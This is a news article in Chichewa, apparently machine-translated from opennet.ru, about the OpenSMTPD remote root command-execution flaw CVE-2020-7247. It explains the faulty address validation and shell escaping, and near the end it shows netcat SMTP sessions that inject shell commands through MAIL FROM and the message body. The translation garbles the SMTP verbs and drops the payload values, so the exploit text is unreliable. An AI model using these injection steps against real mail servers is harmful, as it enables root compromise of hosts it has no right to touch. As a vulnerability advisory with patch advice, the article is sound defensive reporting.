Mu seva yamakalata yopangidwa ndi polojekiti ya OpenBSD kudziwika (CVE-2020-7247), yomwe imakupatsani mwayi wochitira patali malamulo a zipolopolo pa seva ndi ufulu wogwiritsa ntchito mizu. Chiwopsezochi chidadziwika pakuwunikanso kochitidwa ndi Qualys Security (kafukufuku wakale wa OpenSMTPD). mu 2015, ndipo kusatetezeka kwatsopano kwakhalapo kuyambira Meyi 2018). Vuto mu OpenSMTPD 6.6.2 kumasulidwa. Ogwiritsa ntchito onse akulimbikitsidwa kukhazikitsa nthawi yomweyo zosintha (za OpenBSD, chigambacho chikhoza kukhazikitsidwa kudzera pa syspatch).
Njira ziwiri zowukira zikuperekedwa. Njira yoyamba imagwira ntchito yokhazikika ya OpenSMTPD (kuvomereza zopempha kuchokera kwa localhost) ndikukulolani kuti mugwiritse ntchito vutoli kwanuko, pamene wowukirayo atha kupeza mawonekedwe a netiweki (loopback) pa seva (mwachitsanzo, pamakina ochitira) . Njira yachiwiri imachitika pamene OpenSMTPD imakonzedwa kuti ilandire zopempha zakunja zapaintaneti (seva yamakalata yomwe imavomereza makalata a chipani chachitatu). Ofufuzawo akonza chitsanzo cha ntchito yomwe imagwira ntchito bwino ndi mtundu wa OpenSMTPD wophatikizidwa mu OpenBSD 6.6 komanso ndi mtundu wosunthika wamakina ena ogwiritsira ntchito (opangidwa mu Debian Testing).
Vutoli limayamba chifukwa cha zolakwika mu ntchito ya smtp_mailaddr (), yomwe imatchedwa kuwona kulondola kwa mfundo zomwe zili m'magawo a "MAIL FROM" ndi "RCPT TO" omwe amatanthauzira wotumiza / wolandila ndipo amaperekedwa panthawi yolumikizana. ndi seva yamakalata. Kuti muwone gawo la imelo lomwe limabwera patsogolo pa chizindikiro cha "@", smtp_mailaddr() ntchito imatchedwa
valid_localpart(), yomwe imavomereza (MAILADDR_ALLOWED) zilembo "!#$%&'*/?^`{|}~+-=_", malinga ndi RFC 5322.
Pamenepa, kuthawa kwachindunji kwa chingwe kumachitidwa mu mda_expand_token() ntchito, yomwe imalowa m'malo mwa zilembo "!#$%&'*?`{|}~" (MAILADDR_ESCAPE). Pambuyo pake, mzere wokonzedwa mda_expand_token() umagwiritsidwa ntchito poyitana wothandizira (MDA) pogwiritsa ntchito lamulo la 'execle("/bin/sh", "/bin/sh", "-c", mda_command,...' Mukayika zilembo ku mbox kudzera /bin/sh, mzere "/usr/libexec/mail.local -f %%{mbox.from} %%{username}" umatsegulidwa, pomwe mtengo wake "% {mbox.from}β ikuphatikizanso data yomwe yatuluka mu "MAIL FROM" parameter.
Zomwe zili pachiwopsezo ndikuti smtp_mailaddr() ili ndi cholakwika chomveka, chifukwa chake, ngati malo opanda kanthu atumizidwa ku imelo, ntchitoyi imabwezeretsanso nambala yotsimikizira yopambana, ngakhale gawo la adilesi lisanachitike "@" lili ndi zilembo zosavomerezeka. . Komanso, pokonzekera chingwe, mda_expand_token() ntchito sikuthawa zilembo zapadera zomwe zingatheke, koma zilembo zapadera zokha zomwe zimaloledwa mu imelo. Chifukwa chake, kuti muthamangitse lamulo lanu, ndikokwanira kugwiritsa ntchito chizindikiro cha ";" mu gawo lapafupi la imelo. ndi malo, omwe sanaphatikizidwe mu MAILADDR_ESCAPE seti ndipo sanathawe. Mwachitsanzo:
$nc 127.0.0.1 25
HELO professor.falken
MAIL OCHOKERA:
RCPT KWA:
DETA
.
Siya
Pambuyo pa gawoli, OpenSMTPD, ikaperekedwa ku mbox, idzakhazikitsa lamulo kudzera mu chipolopolo
/usr/libexec/mail.local -f ;gona 66; mizu
Nthawi yomweyo, kuthekera kwachiwopsezo kumakhala kochepa chifukwa gawo la adilesi silingadutse zilembo 64, ndipo zilembo zapadera '$' ndi '|' zimasinthidwa ndi ":"" pothawa. Kuti tidutse malirewa, timagwiritsa ntchito mfundo yakuti thupi la kalatayo limafalitsidwa pambuyo pothamanga /usr/libexec/mail.local kupyolera mumtsinje wolowetsa, i.e. Pogwiritsa ntchito adilesi, mutha kungoyambitsa wotanthauzira sh ndikugwiritsa ntchito thupi la chilembocho ngati malangizo. Popeza kuti mitu ya SMTP yautumiki ikuwonetsedwa kumayambiriro kwa kalatayo, tikulimbikitsidwa kugwiritsa ntchito lamulo lowerengera mu lupu kuti mulumphe. Kugwira ntchito kumawoneka motere:
$nc 192.168.56.143 25
HELO professor.falken
MAIL KUCHOKERA:
RCPT KWA: <[imelo ndiotetezedwa]>
DETA
#0
#1
...
#d
pakuti ine mu W O P R; kuchita
echo -n "($i) " && id || kuswa
zachitika > /root/x."`id -u`." "$$"
.
Siya
Source: opennet.ru